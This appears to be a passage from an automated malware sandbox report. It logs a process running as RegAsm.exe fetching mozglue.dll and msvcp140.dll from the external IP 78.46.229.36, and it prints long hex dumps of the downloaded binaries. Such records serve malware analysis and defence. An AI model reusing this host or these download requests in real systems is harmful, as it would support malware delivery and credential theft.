2024-03-28 08:16:45 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-03-28 08:16:45 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49910	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:46 UTC	253	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Range: bytes=1024- If-Range: "6315a9f4-94750" Cache-Control: no-cache
2024-03-28 08:16:46 UTC	278	IN	HTTP/1.1 206 Partial Content Server: nginx Date: Thu, 28 Mar 2024 08:16:46 GMT Content-Type: application/octet-stream Content-Length: 607056 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Content-Range: bytes 1024-608079/608080
2024-03-28 08:16:46 UTC	16106	IN	Data Raw: 55 89 e5 5d e9 07 ba 01 00 cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 40 89 ce a1 0c e0 08 10 31 e8 89 44 24 38 8b 3d d4 e7 08 10 89 7c 24 18 c7 44 24 1c 00 00 00 00 8b 49 14 31 d2 4a 31 c0 3b 4f 14 0f 97 c0 0f 42 c2 85 c0 75 0f 8b 4e 10 31 c0 3b 4f 10 0f 97 c1 72 0b 88 c8 83 f8 ff 0f 85 14 01 00 00 8b 07 85 c0 0f 84 65 01 00 00 c7 04 24 00 00 00 00 f6 40 04 01 0f 84 44 01 00 00 89 fb 89 c7 8b 4e 14 31 c0 3b 4f 14 0f 97 c0 0f 42 c2 85 c0 75 21 8b 4e 10 31 c0 3b 4f 10 0f 97 c1 73 12 8b 07 85 c0 0f 84 0f 02 00 00 f6 40 04 01 75 cd eb 18 88 c8 83 f8 ff 74 e7 85 c0 75 39 8b 47 04 89 1c 24 83 f8 01 76 6e eb 2f 8b 08 85 c9 74 06 f6 41 04 01 75 a7 8d 4c 24 0c 89 fa e8 c9 0a 00 00 8b 44 24 0c 39 3b 0f 85 bb 02 00 00 89 03 89 c7 31 d2 4a eb 8b 8b 47 04 Data Ascii: U]USWV@1D$8=\|$D$I1J1;OBuN1;Ore$@DN1;OBu!N1;Os@utu9G$vn/tAuL$D$9;1JG
2024-03-28 08:16:46 UTC	16384	IN	Data Raw: 50 74 07 00 83 c4 04 89 c6 8d 47 08 89 44 24 04 8b 07 03 47 08 56 53 50 e8 43 74 07 00 83 c4 0c 8b 44 24 04 01 30 eb 8a 48 89 f1 ff 75 10 50 ff 74 24 18 53 e8 cd 7e 00 00 e9 74 ff ff ff 66 0f 57 c0 f2 0f 10 4d 08 66 0f 2e c8 75 0d 7a 0b 8b 06 83 e0 08 0f 85 27 ff ff ff 8b 7d 10 8b 07 8b 4f 08 8d 51 01 89 57 08 c6 04 08 2d e9 10 ff ff ff 8b 5e 04 85 db 74 27 66 0f 57 c0 66 0f 2e c1 0f 86 78 ff ff ff 89 fb 8b 07 8b 4f 08 8d 51 01 89 57 08 c6 04 08 2d 8b 5e 04 e9 5f ff ff ff 31 db e9 0e ff ff ff 55 89 e5 53 57 56 83 e4 f0 83 ec 30 8b 4d 20 8b 45 10 f2 0f 10 45 08 f2 0f 11 44 24 08 83 7c 24 0c 00 0f 88 ee 00 00 00 c6 01 00 8b 5d 24 8b 75 18 8b 55 14 83 f8 03 75 08 85 d2 0f 84 f6 00 00 00 8b 7d 28 66 0f 57 c9 66 0f 2e c1 75 06 0f 8b b1 00 00 00 83 f8 03 0f 87 Data Ascii: PtGD$GVSPCtD$0HuPt$S~tfWMf.uz'}OQW-^t'fWf.xOQW-^_1USWV0M EED$\|$]$uUu}(fWf.u
2024-03-28 08:16:46 UTC	16384	IN	Data Raw: 34 ff ff ff e9 7d f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 4b 02 00 00 89 c8 8b bd 38 ff ff ff 8b b5 34 ff ff ff e9 82 f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 27 02 00 00 89 c8 e9 90 f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 0f 02 00 00 89 c8 e9 9b f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 f7 01 00 00 89 c8 e9 a6 f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 df 01 00 00 89 c8 e9 b1 f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 c7 01 00 00 89 c8 e9 bf f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 af 01 00 00 89 c8 e9 cd f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 97 01 00 00 89 c8 e9 db f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f 83 7f 01 00 00 89 c8 8b bd 38 ff ff ff e9 e0 f9 ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 0f Data Ascii: 4}H) K84H) 'H) H) H) H) H) H) H) 8H)
2024-03-28 08:16:46 UTC	16384	IN	Data Raw: 2e 4e 40 8b 0b 03 4b 08 56 50 51 e8 50 f4 06 00 83 c4 0c 03 73 08 89 73 08 89 f1 e9 25 ff ff ff 8b 45 e4 f6 00 01 74 12 8b 75 14 8b 06 8b 4e 08 8d 51 01 89 56 08 c6 04 08 2b c6 45 ef 00 85 ff 0f 85 30 ff ff ff c6 45 ee 30 b9 04 00 00 00 e9 4c ff ff ff 29 f7 8d 04 2f 83 c0 ea 8d 4c 31 fb 51 6a 30 50 e8 7f f3 06 00 83 c4 0c 89 f9 e9 4f ff ff ff cc cc cc 55 89 e5 e8 a8 00 03 00 84 c0 74 10 8b 55 08 31 c9 41 e8 59 05 02 00 8b 40 08 5d c3 31 c0 eb fa 55 89 e5 56 83 e4 f8 83 ec 10 8b 75 08 a1 0c e0 08 10 31 e8 89 44 24 08 89 e0 6a 08 50 e8 30 f2 06 00 84 c0 74 21 f2 0f 10 04 24 f2 0f 11 06 b0 01 88 46 08 8b 4c 24 08 31 e9 e8 61 e3 02 00 89 f0 8d 65 fc 5e 5d c3 0f 57 c0 0f 11 06 31 c0 eb e0 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 0c Data Ascii: .N@KVPQPss%EtuNQV+E0E0L)/L1Qj0POUtU1AY@]1UVu1D$jP0t!$FL$1ae^]W1USWV
2024-03-28 08:16:47 UTC	16384	IN	Data Raw: 8b 0d c8 e3 08 10 64 8b 15 2c 00 00 00 8b 0c 8a 3b 81 04 00 00 00 7e 56 68 28 f5 08 10 e8 7d 9c 02 00 83 c4 04 83 3d 28 f5 08 10 ff 75 40 68 92 4e 08 10 ff 15 bc be 08 10 a3 20 f5 08 10 c7 05 24 f5 08 10 00 00 00 00 85 c0 74 15 68 91 fa 07 10 50 ff 15 64 be 08 10 a3 24 f5 08 10 85 c0 74 35 68 28 f5 08 10 e8 ea 9b 02 00 83 c4 04 8b 7d 0c 8b 75 08 8b 0d 24 f5 08 10 85 c9 74 0e ff 15 00 00 09 10 57 56 ff d1 5e 5f 5d c3 57 56 ff 15 e0 e2 08 10 eb f2 ff 35 20 f5 08 10 ff 15 3c be 08 10 c7 05 20 f5 08 10 00 00 00 00 eb b3 cc cc cc cc cc cc cc cc 55 89 e5 56 89 c8 8b 4d 08 89 08 31 d2 89 50 04 89 50 08 c6 40 0c 00 85 c9 74 4a 0f b7 11 81 fa 4d 5a 00 00 75 3f 8b 71 3c 8d 14 31 89 50 04 81 3c 31 50 45 00 00 75 2d 0f b7 72 18 81 fe 0b 01 00 00 75 21 8b 72 50 81 fe Data Ascii: d,;~Vh(}=(u@hN $thPd$t5h(}u$tWV^_]WV5 < UVM1PP@tJMZu?q<1P<1PEu-ru!rP
2024-03-28 08:16:47 UTC	16384	IN	Data Raw: ff ff 89 07 e9 f0 fe ff ff 85 d2 0f 84 41 02 00 00 39 1a 0f 85 a7 01 00 00 89 32 8b 03 89 06 8b 43 04 83 e0 fe 8b 4e 04 83 e1 01 09 c1 89 4e 04 8b 4b 04 83 e1 01 09 c1 89 4e 04 39 37 0f 85 92 01 00 00 c7 07 00 00 00 00 e9 f1 fe ff ff 8b 4e 04 83 f9 01 0f 86 84 01 00 00 8d 7c 24 18 e9 f0 fd ff ff 8b 06 85 c0 0f 84 96 01 00 00 f6 40 04 01 74 44 8d 4c 24 14 89 f2 e8 f8 01 00 00 8d 44 24 14 8b 00 8d 74 24 18 89 06 e9 e3 fd ff ff 89 54 24 04 8d 4c 24 10 89 f2 e8 b8 03 00 00 8b 44 24 10 39 37 0f 85 74 01 00 00 89 07 89 c6 8b 54 24 04 e9 c1 fd ff ff 83 c9 01 89 4e 04 8b 08 85 c9 74 08 8b 51 04 f6 c2 01 75 23 80 48 04 01 8b 4e 04 89 c8 83 e0 fe 0f 84 5a 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 eb 96 83 e2 fe 89 51 04 8b 06 85 c0 0f 84 4e 01 00 00 8b Data Ascii: A92CNNKN97N\|$@tDL$D$t$T$L$D$97tT$NtQu#HNZN0QN
2024-03-28 08:16:47 UTC	16384	IN	Data Raw: e6 02 00 00 50 e8 9c cf 00 00 83 c4 04 e9 57 f6 ff ff 8b 44 24 20 41 f7 c1 00 f8 ff 7f 0f 85 df 02 00 00 50 e8 7d cf 00 00 83 c4 04 e9 19 f7 ff ff 8b 44 24 20 41 f7 c1 00 f8 ff 7f 0f 85 d8 02 00 00 50 e8 5e cf 00 00 83 c4 04 e9 df f7 ff ff 8b 44 24 20 41 f7 c1 00 f8 ff 7f 0f 85 ce 02 00 00 50 e8 3f cf 00 00 83 c4 04 e9 a0 f8 ff ff 8b 44 24 20 41 f7 c1 00 f8 ff 7f 0f 85 c4 02 00 00 50 e8 20 cf 00 00 83 c4 04 e9 98 f9 ff ff 8b 44 24 20 41 f7 c1 00 f8 ff 7f 0f 85 ba 02 00 00 50 e8 01 cf 00 00 83 c4 04 e9 6b fa ff ff 8b 44 24 20 41 f7 c1 00 f8 ff 7f 0f 85 b0 02 00 00 50 e8 e2 ce 00 00 83 c4 04 e9 46 fb ff ff 8b 44 24 20 41 f7 c1 00 f8 ff 7f 0f 85 a6 02 00 00 50 e8 c3 ce 00 00 83 c4 04 e9 31 fc ff ff 8b 44 24 20 41 f7 c1 00 f8 ff 7f 0f 85 9c 02 00 00 50 e8 a4 Data Ascii: PWD$ AP}D$ AP^D$ AP?D$ AP D$ APkD$ APFD$ AP1D$ AP
2024-03-28 08:16:47 UTC	16384	IN	Data Raw: 35 07 00 00 8b 10 85 d2 0f 84 e5 04 00 00 f6 42 04 01 0f 85 56 01 00 00 83 c9 01 89 48 04 8b 32 85 f6 74 0f 8b 4e 04 89 0c 24 f6 c1 01 0f 85 4f 01 00 00 80 4a 04 01 8b 48 04 89 ca 83 e2 fe 0f 84 d8 09 00 00 8b 32 83 e6 fe 83 e1 01 09 f1 89 48 04 89 02 8d 44 24 38 e9 0f fe ff ff 8b 54 1f 5c 89 f9 6a 00 e8 9c 2f 00 00 83 c4 04 85 c0 0f 84 e8 01 00 00 3b 06 89 c2 74 5c 89 32 31 c0 83 7c 1f 64 01 74 18 8d 0c 1f 83 c1 64 31 c0 c7 44 82 0c ff ff ff ff 40 8b 31 4e 39 f0 72 f0 8b 4c 24 18 8b 5c 0f 60 83 e3 1f 89 d9 f6 d9 31 f6 4e d3 ee 83 fb 01 8b 5c 24 18 19 c9 09 f1 89 4c 82 0c c7 42 04 00 00 00 00 8b 44 1f 60 89 42 08 ff 44 1f 6c 8b 74 24 04 89 16 e9 9b fb ff ff 31 c9 e9 2e fe ff ff 8b 34 24 83 e6 fe 89 31 8b 72 04 83 e6 01 09 ce 89 72 04 83 e2 fe 8b 48 04 83 Data Ascii: 5BVH2tN$OJH2HD$8T\j/;t\21\|dtd1D@1N9rL$\`1N\$LBD`BDlt$1.4$1rrH
2024-03-28 08:16:47 UTC	16384	IN	Data Raw: db 0a 00 00 89 1a e9 fb fe ff ff 8b 16 85 d2 0f 84 b5 0a 00 00 8b 5a 04 f6 c3 01 0f 84 b9 04 00 00 83 e3 fe 0f 84 9a 0a 00 00 8b 03 85 c0 0f 85 6e 04 00 00 e9 73 04 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 56 04 89 d1 83 e1 fe 0f 84 6f fe ff ff 8b 01 83 e0 fe 83 e2 01 09 c2 89 56 04 89 31 8b 43 04 83 e0 01 09 c8 89 43 04 80 4e 04 01 8b 54 24 04 39 32 0f 85 8b 04 00 00 89 1a 89 d6 e9 14 ff ff ff 8b 0b 85 c9 0f 85 23 03 00 00 39 1a 8b 5c 24 14 8b 74 24 1c 0f 85 1b 04 00 00 89 0a 8b 4c 24 58 c1 ee 0c 8b 44 24 10 89 48 4c 89 f0 8b 4c 24 18 c7 01 00 00 00 00 8d 14 5b 8b 4c 24 08 89 54 24 2c c7 44 91 14 00 00 00 00 8b 4c 24 38 29 c8 0f 84 30 02 00 00 c1 e0 0c 01 d9 8d 0c 49 89 4c 24 18 8b 54 24 08 8d 1c 8a 83 c3 10 b9 ff Data Ascii: ZnsCKKVoV1CCNT$92#9\$t$L$XD$HLL$[L$T$,DL$8)0IL$T$
2024-03-28 08:16:47 UTC	16384	IN	Data Raw: c2 83 e2 fe 8b 71 04 83 e6 01 09 d6 89 71 04 8b 70 04 83 e6 01 09 d6 89 71 04 8b 5c 24 10 80 48 04 01 83 61 04 01 89 ca e9 e1 fa ff ff 89 d0 83 e0 fe 8b 4e 04 83 e1 01 09 c1 89 4e 04 89 f0 e9 46 f9 ff ff 8d 44 24 48 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 10 c7 44 8e 14 01 00 00 00 e9 a2 fc ff ff 83 e1 fe 89 0f 8b 4a 04 83 e1 01 09 f9 89 4a 04 83 e2 fe 8b 78 04 83 e7 01 8d 0c 17 89 48 04 85 d2 0f 84 11 06 00 00 8b 0a 83 e1 fe 09 f9 89 48 04 89 02 8b 78 04 83 e7 fe 74 0c 8b 4f 04 f6 c1 01 0f 85 89 04 00 00 89 78 04 e9 dc f9 ff ff 8b 4f 04 89 ca 83 e2 fe 39 d0 8b 54 24 20 0f 85 45 fc ff ff 83 e1 01 0b 4c 24 04 89 4f 04 e9 36 fc ff ff 31 c9 e9 2d f8 ff ff 85 ff 74 24 8b 47 04 85 c0 74 1d 31 f6 f6 40 08 01 0f 85 3d 02 00 00 8b 48 04 85 c9 74 0a f6 41 08 01 0f Data Ascii: qqpq\$HaNNFD$HT$L$DJJxHHxtOxO9T$ EL$O61-t$Gt1@=HtA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49911	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:48 UTC	206	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:16:49 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:48 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-03-28 08:16:49 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-03-28 08:16:49 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-03-28 08:16:49 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-03-28 08:16:49 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-03-28 08:16:49 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-03-28 08:16:49 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-03-28 08:16:49 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-03-28 08:16:49 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
